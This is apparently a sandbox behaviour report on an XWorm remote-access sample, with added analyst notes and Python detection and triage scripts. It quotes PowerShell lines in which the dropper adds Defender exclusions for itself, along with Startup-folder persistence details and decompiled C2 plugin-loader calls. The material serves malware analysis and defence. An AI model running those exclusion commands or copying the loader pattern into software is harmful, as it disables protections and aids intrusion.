              Source: unknownProcess created: C:\Users\user\Desktop\1c8DbXc5r0.exe "C:\Users\user\Desktop\1c8DbXc5r0.exe"
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1c8DbXc5r0.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
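The four powershell.exe launches above are the dropper carving Defender exclusions for itself and for the copy it drops as rapent.exe, with -ExecutionPolicy Bypass in front so that no script policy interferes. What follows is an added example, not part of the Joe Sandbox report and not XWorm code: detection logic a SOC would run over process-creation telemetry. It fires on Add-MpPreference with any Exclusion* parameter, also decodes the -EncodedCommand form the same tampering usually hides behind (a generalisation beyond what this sample did in plain text), and raises severity when the command is encoded, bypasses policy, or when the parent or the excluded item lives in a user-writable path. The event records, the Sysmon-style field names and the encoded sample are constructed.

```python
"""Detect Windows Defender exclusion tampering in process-creation events.

Added example for this report, not Joe Sandbox or XWorm code. Event records are
constructed to mirror the report's process tree; field names follow Sysmon Event
ID 1 (Image, ParentImage, CommandLine) but any telemetry with a command line works.
"""
import base64
import re

EXCLUSION_PARAMS = ("ExclusionPath", "ExclusionProcess", "ExclusionExtension", "ExclusionIpAddress")
CANONICAL = {p.lower(): p for p in EXCLUSION_PARAMS}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
ADD_MP_RE = re.compile(r"(?i)\bAdd-MpPreference\b")
PARAM_RE = re.compile(
    r"(?i)-(?P<param>Exclusion(?:Path|Process|Extension|IpAddress))\s+"
    r"(?P<q>['\"]?)(?P<val>.+?)(?P=q)(?=\s+-|\s*$)"
)
BYPASS_RE = re.compile(r"(?i)-ExecutionPolicy\s+Bypass")
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")

# Constructed sample: the same cmdlet hidden behind -enc (UTF-16LE, base64).
ENCODED_SAMPLE = base64.b64encode("Add-MpPreference -ExclusionExtension '.exe'".encode("utf-16le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Users\user\Desktop\1c8DbXc5r0.exe"

# Constructed events; the first two copy command lines recorded in the report.
EVENTS = [
    {"Image": PS, "ParentImage": DROPPER,
     "CommandLine": '"' + PS + r"""" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'"""},
    {"Image": PS, "ParentImage": DROPPER,
     "CommandLine": '"' + PS + r"""" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe'"""},
    {"Image": PS, "ParentImage": DROPPER,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",          # benign: must not fire
     "CommandLine": "powershell.exe Get-MpPreference"},
]


def effective_command(cmdline: str) -> str:
    """Return the script that actually runs: the decoded -EncodedCommand if present, else the raw line."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def user_writable(path: str) -> bool:
    """Crude but useful: anything under Users, Temp or ProgramData is writable without elevation."""
    return any(marker in path.lower() for marker in USER_WRITABLE)


def find_exclusion_tampering(events):
    """Return one finding per powershell.exe event that adds a Defender exclusion."""
    findings = []
    for ev in events:
        if not ev["Image"].lower().endswith("\\powershell.exe"):
            continue
        script = effective_command(ev["CommandLine"])
        if not ADD_MP_RE.search(script):
            continue
        exclusions = [(CANONICAL[m.group("param").lower()], m.group("val")) for m in PARAM_RE.finditer(script)]
        encoded = script != ev["CommandLine"]
        bypass = bool(BYPASS_RE.search(ev["CommandLine"]))
        risky = encoded or bypass or user_writable(ev["ParentImage"]) or any(user_writable(v) for _, v in exclusions)
        findings.append({
            "parent": ev["ParentImage"],
            "encoded": encoded,
            "policy_bypass": bypass,
            "exclusions": exclusions,
            "severity": "high" if risky else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_exclusion_tampering(EVENTS):
        print(finding)
```

Add-MpPreference only succeeds from an elevated context, so an exclusion that actually took effect also tells you the dropper ran with admin rights. On a suspect host, Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess shows whether these entries landed, and Remove-MpPreference with the same parameters removes them.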
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: version.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: appresolver.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: slc.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: sxs.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: scrrun.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: linkinfo.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: ntshrui.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: cscapi.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: rasapi32.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: rasman.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: rtutils.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: dhcpcsvc6.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: dhcpcsvc.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: secur32.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: avicap32.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: msvfw32.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Section loaded: winmm.dll
              Of note in this set: avicap32.dll and msvfw32.dll (Video for Windows capture, i.e. webcam access), winmm.dll (multimedia API), wbemcomn.dll (WMI client), schannel.dll with ncryptsslp.dll and mskeyprotect.dll (TLS through Schannel), winhttp.dll and dnsapi.dll (outbound HTTP and DNS), and amsi.dll, consistent with the CLR's AMSI scan of assemblies loaded from byte arrays on .NET Framework 4.8 and later, which matches the AppDomain.Load(byte[]) plugin loading recorded under Data Obfuscation below.
              The four powershell.exe instances loaded an identical set of sections; the set is listed once here:
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
              Source: rapent.lnk.0.dr  LNK file: ..\..\..\..\..\rapent.exe
              Source: Window Recorder  Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: 1c8DbXc5r0.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 1c8DbXc5r0.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: 1c8DbXc5r0.exe, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 1c8DbXc5r0.exe, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: rapent.exe.0.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: rapent.exe.0.dr, Messages.cs  .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 1c8DbXc5r0.exe, Messages.cs  .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 1c8DbXc5r0.exe, Messages.cs  .Net Code: Memory System.AppDomain.Load(byte[])
              Source: 1c8DbXc5r0.exe, Messages.cs  .Net Code: Memory
              Source: rapent.exe.0.dr, Messages.cs  .Net Code: Plugin System.AppDomain.Load(byte[])
              Source: rapent.exe.0.dr, Messages.cs  .Net Code: Memory System.AppDomain.Load(byte[])
              Source: rapent.exe.0.dr, Messages.cs  .Net Code: Memory
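The LateCall entries above are the XWorm plugin loader seen from the client side: a plugin assembly arrives inside a C2 message, Pack[3] is base64-decoded and passed through Helper.Decompress, the bytes go into AppDomain.Load(byte[]) (never touching disk), and the plugin's Invoke method is then handed either the C2 settings (Settings.Host, Settings.Port, Settings.SPL, Settings.KEY, Helper.ID()) or Pack[2] together with the decoded Pack[3]. The following is an added example, not the malware's code and not part of the report: it unpacks such a message the way the report shows the client doing it and checks that the decoded payload is a PE before hashing it, which is the hash to hunt for in memory since the base64 on the wire never matches anything. It assumes gzip for Helper.Decompress (the report does not show that method's body); the separator string, the four-field message layout and the stand-in assembly bytes are all constructed.

```python
"""Unpack an XWorm-style plugin message and check the assembly it carries.

Added example; not XWorm's code and not from the report. Assumptions: gzip for
Helper.Decompress (the report only names the method), a constructed separator
and field layout, and a constructed stand-in for the managed assembly.
"""
import base64
import gzip
import hashlib
import struct

SPL = "<Xwormmm>"  # constructed; the real separator is Settings.SPL, a per-build value


def build_fake_assembly() -> bytes:
    """Constructed stand-in for a managed PE: an MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    e_lfanew = 0x80
    stub = bytearray(b"MZ" + b"\x00" * (e_lfanew - 2))
    struct.pack_into("<I", stub, 0x3C, e_lfanew)   # e_lfanew lives at offset 0x3C of the DOS header
    return bytes(stub) + b"PE\x00\x00" + b"\x00" * 20


def encode_plugin_message(plugin_name: str, assembly: bytes) -> str:
    """Controller side (constructed layout): cmd | unused | Pack[2]=name | Pack[3]=b64(gzip(asm))."""
    blob = base64.b64encode(gzip.compress(assembly)).decode("ascii")
    return SPL.join(["plugin", "", plugin_name, blob])


def parse_plugin_message(msg: str):
    """Client side as the report shows it: Pack[3] is base64-decoded, then decompressed."""
    pack = msg.split(SPL)
    if len(pack) < 4:
        raise ValueError("plugin message needs at least four fields")
    return pack[2], gzip.decompress(base64.b64decode(pack[3]))


def looks_like_pe(data: bytes) -> bool:
    """Structural sanity check before treating a blob as an assembly: MZ header and PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage_plugin_message(msg: str) -> dict:
    """What an analyst wants from one captured message: plugin name, PE check, size and hash of the real payload."""
    name, asm = parse_plugin_message(msg)
    return {
        "plugin": name,
        "is_pe": looks_like_pe(asm),
        "size": len(asm),
        "sha256": hashlib.sha256(asm).hexdigest(),
    }


if __name__ == "__main__":
    message = encode_plugin_message("Keylogger", build_fake_assembly())
    print(triage_plugin_message(message))
```

Because the assembly is loaded from a byte array it has no backing file on disk; on a live host the CLR's AssemblyLoad ETW events (an assembly with no module path) and a memory scan for the decompressed hash are the places to look, and the amsi.dll load recorded for the sample above is the CLR submitting exactly these byte[] loads to AMSI.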
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Code function: 0_2_00007FFD9B8806A8 push ebx; retf 0_2_00007FFD9B8806EA
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Code function: 0_2_00007FFD9B8805FA push ebx; retf 0_2_00007FFD9B88060A
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  Code function: 0_2_00007FFD9B8805F8 push ebx; retf 0_2_00007FFD9B88060A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 1_2_00007FFD9B78D2A5 pushad ; iretd 1_2_00007FFD9B78D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 1_2_00007FFD9B970038 push eax; iretd 1_2_00007FFD9B970039
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 1_2_00007FFD9B972316 push 8B485F92h; iretd 1_2_00007FFD9B97231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FFD9B77D2A5 pushad ; iretd 4_2_00007FFD9B77D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 4_2_00007FFD9B962316 push 8B485F93h; iretd 4_2_00007FFD9B96231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 7_2_00007FFD9B79D2A5 pushad ; iretd 7_2_00007FFD9B79D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 7_2_00007FFD9B982316 push 8B485F91h; iretd 7_2_00007FFD9B98231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 11_2_00007FFD9B76D2A5 pushad ; iretd 11_2_00007FFD9B76D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 11_2_00007FFD9B952316 push 8B485F94h; iretd 11_2_00007FFD9B95231B
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  File created: C:\Users\user\AppData\Roaming\rapent.exe
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe  File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rapent.lnk
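The dropped rapent.exe and the Startup-folder rapent.lnk above are the persistence pair, and the shortcut target recorded earlier in this report is the relative path ..\..\..\..\..\rapent.exe, which only makes sense once resolved against the folder holding the .lnk. The following is an added example, not from the report: it does that resolution with ntpath so Windows path rules apply on any analysis host, and applies the triage a responder runs over every Startup shortcut, flagging relative targets that climb out of the Startup folder, targets outside trusted install roots, and targets that match the sample's dropped files. The shortcut list and the trusted roots are constructed; the dropped-file path is the one the report records.

```python
"""Resolve Startup-folder shortcut targets and triage them.

Added example, not from the report. LNK targets can be stored relative to the
folder that holds the .lnk; the report's rapent.lnk carries ..\\..\\..\\..\\..\\rapent.exe,
five levels up from Startup, which is exactly the distance to %APPDATA%.
"""
import ntpath

STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
# Constructed allow-list: targets under these roots need admin rights to write and are not flagged.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
# From the report: the file the dropper wrote next to its persistence shortcut.
DROPPED_FILES = {r"c:\users\user\appdata\roaming\rapent.exe"}

# Constructed shortcut list: the report's entry plus two benign ones for contrast.
SHORTCUTS = {
    "rapent.lnk": r"..\..\..\..\..\rapent.exe",
    "OneNote.lnk": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE",
    "helper.lnk": r".\helper.exe",
}


def resolve_lnk_target(target: str, base: str = STARTUP) -> str:
    """Absolute targets are normalised; relative ones are resolved against the .lnk's own folder."""
    if ntpath.isabs(target):
        return ntpath.normpath(target)
    return ntpath.normpath(ntpath.join(base, target))


def triage_shortcut(target: str, base: str = STARTUP) -> dict:
    """Resolve one target and collect the reasons a responder would want to look at it."""
    resolved = resolve_lnk_target(target, base)
    low = resolved.lower()
    inside_startup = low.startswith(ntpath.normpath(base).lower() + "\\")
    escapes = not ntpath.isabs(target) and not inside_startup
    trusted = low.startswith(TRUSTED_ROOTS)
    dropped = low in DROPPED_FILES
    reasons = []
    if escapes:
        reasons.append("relative target climbs out of the Startup folder")
    if not trusted:
        reasons.append("target lives outside trusted install roots (user-writable)")
    if dropped:
        reasons.append("target is a file dropped by the sample")
    return {
        "resolved": resolved,
        "escapes_startup": escapes,
        "user_writable": not trusted,
        "dropped_by_sample": dropped,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


def triage_all(shortcuts=SHORTCUTS, base: str = STARTUP) -> dict:
    """Map each shortcut name to its triage result."""
    return {name: triage_shortcut(target, base) for name, target in shortcuts.items()}


if __name__ == "__main__":
    for name, result in triage_all().items():
        print(name, "->", result["resolved"], "|", "; ".join(result["reasons"]) or "clean")
```

The resolution confirms that the shortcut points at the copy the dropper wrote to C:\Users\user\AppData\Roaming\rapent.exe, so removing the .lnk without the target (or the reverse) leaves the pair half intact; both belong on the same remediation list.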

              Hooking and other Techniques for Hiding and Protection

              Note: the BitLocker.psd1 opens below are PowerShell's module auto-discovery reading module manifests on the module path while it resolves Add-MpPreference for the four exclusion commands; no command line recorded in this report references BitLocker, so these entries are a side effect of those commands rather than BitLocker activity by the sample.
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (recorded 16 times across the powershell.exe instances)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (recorded 12 times across the powershell.exe instances)
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Process information set: NOOPENFILEERRORBOX (60 identical entries in the report)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
